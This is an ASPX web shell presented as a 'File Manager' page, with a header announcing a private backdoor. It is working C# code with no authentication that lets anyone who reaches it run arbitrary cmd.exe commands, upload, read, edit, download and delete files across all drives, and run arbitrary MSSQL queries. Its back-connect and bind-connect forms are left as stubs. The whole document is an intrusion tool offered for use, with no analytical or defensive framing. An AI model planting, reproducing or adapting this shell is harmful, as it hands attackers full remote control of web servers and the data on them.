[$] Pr1v473 xHeEl B4ckD00RzZ [$]
<%@ Page Language="C#" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html>
<html>
<head>
<title>File Manager</title>
<style>
body {
background-color: black;
color: white;
font-family: Arial, sans-serif;
}
input, textarea, select {
background-color: #333;
color: white;
border: 1px solid #555;
}
a {
color: #00aaff;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
pre {
white-space: pre-wrap;
word-wrap: break-word;
}
</style>
<script>
function toggleVisibility(id) {
var element = document.getElementById(id);
if (element.style.display === 'none') {
element.style.display = 'block';
} else {
element.style.display = 'none';
}
}
</script>
</head>
<body>
<h1>ASPX File Manager</h1>
<%
string currentPath = Request.QueryString["path"];
if (string.IsNullOrEmpty(currentPath))
{
currentPath = Server.MapPath("~/");
}
DirectoryInfo dirInfo = new DirectoryInfo(currentPath);
if (Request.HttpMethod == "POST")
{
if (Request.Form["upload"] != null && Request.Files["fileToUpload"] != null)
{
HttpPostedFile file = Request.Files["fileToUpload"];
string savePath = Path.Combine(currentPath, Path.GetFileName(file.FileName));
file.SaveAs(savePath);
Response.Write("<p>File uploaded successfully!</p>");
}
else if (Request.Form["delete"] != null)
{
string deleteFile = Request.Form["delete"];
string deletePath = Path.Combine(currentPath, deleteFile);
if (File.Exists(deletePath))
{
File.Delete(deletePath);
Response.Write("<p>File deleted successfully!</p>");
}
}
else if (Request.Form["save"] != null)
{
string filePath = Request.Form["filePath"];
string fileContent = Request.Form["fileContent"];
File.WriteAllText(filePath, fileContent);
Response.Write("<p>File saved successfully!</p>");
}
else if (Request.Form["cmd"] != null)
{
string cmdInput = Request.Form["cmd"];
Process proc = new Process();
proc.StartInfo.FileName = "cmd.exe";
proc.StartInfo.Arguments = "/c " + cmdInput;
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.StartInfo.RedirectStandardError = true;
proc.Start();
string cmdOutput = proc.StandardOutput.ReadToEnd();
string cmdError = proc.StandardError.ReadToEnd();
proc.WaitForExit();
Response.Write("<h3>Command Output:</h3>");
Response.Write("<pre>" + Server.HtmlEncode(cmdOutput) + "</pre>");
if (!string.IsNullOrEmpty(cmdError))
{
Response.Write("<h3>Command Error:</h3>");
Response.Write("<pre>" + Server.HtmlEncode(cmdError) + "</pre>");
}
}
else if (Request.Form["backConnect"] != null)
{
string host = Request.Form["host"];
int port = int.Parse(Request.Form["port"]);
// Add back connect implementation here
// Note: Back connect code is not provided due to security risks
Response.Write("<p>Back connect to " + host + ":" + port + " initiated (implementation required).</p>");
}
else if (Request.Form["bindConnect"] != null)
{
int port = int.Parse(Request.Form["port"]);
// Add bind connect implementation here
// Note: Bind connect code is not provided due to security risks
Response.Write("<p>Bind connect on port " + port + " initiated (implementation required).</p>");
}
else if (Request.Form["mssqlQuery"] != null)
{
string connectionString = Request.Form["connectionString"];
string query = Request.Form["query"];
using (SqlConnection connection = new SqlConnection(connectionString))
{
SqlCommand command = new SqlCommand(query, connection);
connection.Open();
SqlDataReader reader = command.ExecuteReader();
Response.Write("<h3>Query Result:</h3>");
Response.Write("<pre>");
while (reader.Read())
{
for (int i = 0; i < reader.FieldCount; i++)
{
Response.Write(reader[i] + "\t");
}
Response.Write("\n");
}
Response.Write("</pre>");
reader.Close();
}
}
}
if (!dirInfo.Exists)
{
Response.Write("<p>Directory does not exist.</p>");
return;
}
Response.Write("<h2>Current Directory: " + dirInfo.FullName + "</h2>");
Response.Write("<h3>Drives: ");
foreach (string drive in Directory.GetLogicalDrives())
{
Response.Write("<a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(drive) + "'>" + drive + "</a> ");
}
Response.Write("</h3>");
%>
<form method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" />
<input type="submit" name="upload" value="Upload File" />
</form>
<br />
<form method="post">
<input type="text" name="cmd" placeholder="Enter command" />
<input type="submit" value="Execute Command" />
</form>
<br />
<div>
<button onclick="toggleVisibility('backConnectForm')">Back Connect</button> -
<button onclick="toggleVisibility('bindConnectForm')">Bind Connect</button> -
<button onclick="toggleVisibility('mssqlForm')">MSSQL Query</button>
</div>
<div id="backConnectForm" style="display:none;">
<form method="post">
<input type="text" name="host" placeholder="Back connect host" />
<input type="text" name="port" placeholder="Back connect port" />
<input type="submit" name="backConnect" value="Initiate Back Connect" />
</form>
</div>
<div id="bindConnectForm" style="display:none;">
<form method="post">
<input type="text" name="port" placeholder="Bind connect port" />
<input type="submit" name="bindConnect" value="Initiate Bind Connect" />
</form>
</div>
<div id="mssqlForm" style="display:none;">
<form method="post">
<input type="text" name="connectionString" placeholder="MSSQL connection string" />
<textarea name="query" placeholder="Enter MSSQL query" rows="5" cols="80"></textarea><br />
<input type="submit" name="mssqlQuery" value="Execute Query" />
</form>
</div>
<br />
<ul>
<%
if (dirInfo.Parent != null)
{
Response.Write("<li><a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(dirInfo.Parent.FullName) + "'>.. (Up)</a></li>");
}
foreach (DirectoryInfo dir in dirInfo.GetDirectories())
{
Response.Write("<li><a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(dir.FullName) + "'>" + dir.Name + "</a></li>");
}
foreach (FileInfo file in dirInfo.GetFiles())
{
Response.Write("<li>" + file.Name + " - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&delete=" + file.Name + "'>Delete</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&edit=" + file.Name + "'>Edit</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&read=" + file.Name + "'>Read</a> - <a href='" + Request.ServerVariables["SCRIPT_NAME"] + "?path=" + Server.UrlEncode(currentPath) + "&download=" + file.Name + "'>Download</a></li>");
}
%>
</ul>
<%
if (!string.IsNullOrEmpty(Request.QueryString["read"]))
{
string fileToRead = Path.Combine(currentPath, Request.QueryString["read"]);
if (File.Exists(fileToRead))
{
string fileContent = File.ReadAllText(fileToRead);
Response.Write("<h3>Reading File: " + Request.QueryString["read"] + "</h3>");
Response.Write("<pre>" + Server.HtmlEncode(fileContent) + "</pre>");
}
}
else if (!string.IsNullOrEmpty(Request.QueryString["edit"]))
{
string fileToEdit = Path.Combine(currentPath, Request.QueryString["edit"]);
if (File.Exists(fileToEdit))
{
string fileContent = File.ReadAllText(fileToEdit);
Response.Write("<h3>Editing File: " + Request.QueryString["edit"] + "</h3>");
Response.Write("<form method='post'>");
Response.Write("<input type='hidden' name='filePath' value='" + fileToEdit + "' />");
Response.Write("<textarea name='fileContent' rows='20' cols='80'>" + Server.HtmlEncode(fileContent) + "</textarea><br />");
Response.Write("<input type='submit' name='save' value='Save' />");
Response.Write("</form>");
}
}
else if (!string.IsNullOrEmpty(Request.QueryString["download"]))
{
string fileToDownload = Path.Combine(currentPath, Request.QueryString["download"]);
if (File.Exists(fileToDownload))
{
Response.Clear();
Response.ContentType = "application/octet-stream";
Response.AddHeader("Content-Disposition", "attachment; filename=" + Path.GetFileName(fileToDownload));
Response.WriteFile(fileToDownload);
Response.End();
}
}
%>
</body>
</html>